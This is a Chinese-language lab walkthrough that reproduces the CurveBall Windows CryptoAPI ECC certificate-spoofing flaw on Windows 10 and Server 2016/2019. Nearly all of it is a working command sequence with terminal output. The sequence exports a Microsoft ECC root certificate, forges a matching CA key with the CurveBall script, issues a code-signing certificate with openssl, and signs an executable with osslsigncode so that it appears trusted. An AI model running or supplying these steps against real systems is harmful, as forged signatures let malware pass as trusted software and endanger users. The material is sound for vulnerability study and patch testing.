影响版本:
Windows 10
Windows Server 2016/2019
依赖于Windows CryptoAPI的应用程序
查看win证书
查看一下本地windows证书,win+r输入certmgr.msc
这里可以看到系统默认的ECC签名根证书,随便找一个导出:
双击证书可以看到证书的详细信息:
复现:
//安装 rudy
a@a-virtual-machine:~$ sudo apt install ruby
//若提示进程被占用解决方法
//ps -A | grep apt 列出使用的进程
//sudo kill -9 进程号 杀死进程
//生成spoofed_ca.key公钥文件
a@a-virtual-machine:~/CurveBall-master$ ruby main.rb ./MicrosoftECCProductRootCertificateAuthority.cer
//生成spoofed_ca.crt公钥文件
a@a-virtual-machine:~/CurveBall-master$ openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt
Can't load /home/a/.rnd into RNG
140535782355392:error:2406F079:random number generator:RAND_load_file:Cannot open file:../crypto/rand/randfile.c:88:Filename=/home/a/.rnd
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:aa
State or Province Name (full name) [Some-State]:aa
Locality Name (eg, city) []:aa
Organization Name (eg, company) [Internet Widgits Pty Ltd]:aa
Organizational Unit Name (eg, section) []:aa
Common Name (e.g. server FQDN or YOUR name) []:aa
Email Address []:aa '
//生成cert.key密钥文件
a@a-virtual-machine:~/CurveBall-master$ openssl ecparam -name secp384r1 -genkey -noout -out cert.key
//生成cert.csr文件
a@a-virtual-machine:~/CurveBall-master$ openssl req -new -key cert.key -out cert.csr -config openssl_cs.conf -reqexts v3_cs
//生成cert.crt签名证书
a@a-virtual-machine:~/CurveBall-master$ openssl x509 -req -in cert.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl_cs.conf -extensions v3_cs
Signature ok
subject=C = DK, ST = Denmark, L = Copenhagen, O = ollypwn, CN = ollypwn
Getting CA Private Key
//生成cert.p12证书文件
a@a-virtual-machine:~/CurveBall-master$ openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed_ca.crt -name "Code Signing" -out cert.p12
Enter Export Password:
Verifying - Enter Export Password:
生成python_signed.exe签名可执行文件
a@a-virtual-machine:~/CurveBall-master$ osslsigncode sign -pkcs12 cert.p12 -n "Signed by ollypwn" -in python.exe -out python_signed.exe
Command 'osslsigncode' not found, but can be installed with:
sudo apt install osslsigncode
a@a-virtual-machine:~/CurveBall-master$ sudo apt install osslsigncode
[sudo] a 的密码:
正在读取软件包列表... 完成
a@a-virtual-machine:~/CurveBall-master$ osslsigncode sign -pkcs12 cert.p12 -n "Signed by ollypwn" -in 7z1900-x64.exe -out python_signed.exe
Succeeded
参考文献:
https://github.com/ollypwn/CurveBall
https://blog.csdn.net/Eastmount/article/details/104335673